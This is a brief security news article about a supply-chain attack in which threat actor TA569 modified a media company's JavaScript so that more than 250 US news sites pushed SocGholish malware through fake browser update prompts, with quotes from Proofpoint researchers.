250 US News Sites Compromised and Used to Push SocGholish Malware

Written by Andrew Doyle

November 3, 2022

Hackers are distributing the SocGholish JavaScript malware framework (also known as FakeUpdates) through the compromised infrastructure of an undisclosed media company.

It is a firm that provides both video content and advertising to major news outlets, according to the media company in question. According to Sherrod DeGrippo, VP of Threat Research and Detection at Proofpoint, “[It] serves many different companies in different markets across the United States,”

It appears that the threat actor responsible for the supply-chain attack (tracked by Proofpoint as TA569) has injected malicious code into a benign JavaScript file that is loaded by the websites of the media outlets.

Malicious JavaScript File – Attacks Again After Remediation

SocGholish is installed by this malicious JavaScript file, which infects people who visit compromised websites with malware payloads disguised as fake browser updates that are delivered via fake update alerts (e.g., Chrome.Urdate.zip, Chrome.Updater.zip, Firefokh.Urdate.zip, Opera.Update.zip, Oper.Updte.zip).

In a twitter threat, Proofpoint’s Threat insight stated: “Proofpoint Threat Research has observed intermittent injections on a media company that serves many major news outlets. This media company serves content via Javascript to its partners,”

“By modifying the codebase of this otherwise benign JS, it is now used to deploy SocGholish.”

More than 250 U.S. news outlets have been affected by the malware, including major news outlets, according to security researchers at Proofpoint.

There is no exact number of affected news organizations, but Proofpoint says it knows of affected media organizations (including national news outlets) in New York, Boston, Chicago, Miami, and Washington, D.C.

Another important thing to note about this particular attack is that it’s known to attack again as soon as the first attack is remediated. Security researchers at Proofpoint noted this by saying: “The situation needs to be closely monitored, as Proofpoint has observed TA569 reinfect the same assets just days after remediation.”

Related Articles

Stay Up to Date With The Latest News & Updates

Join Our Newsletter


Subscribe To Our Newsletter

Sign up to our weekly newsletter summarizing everything thats happened in data security, storage, and backup and disaster recovery

You have Successfully Subscribed!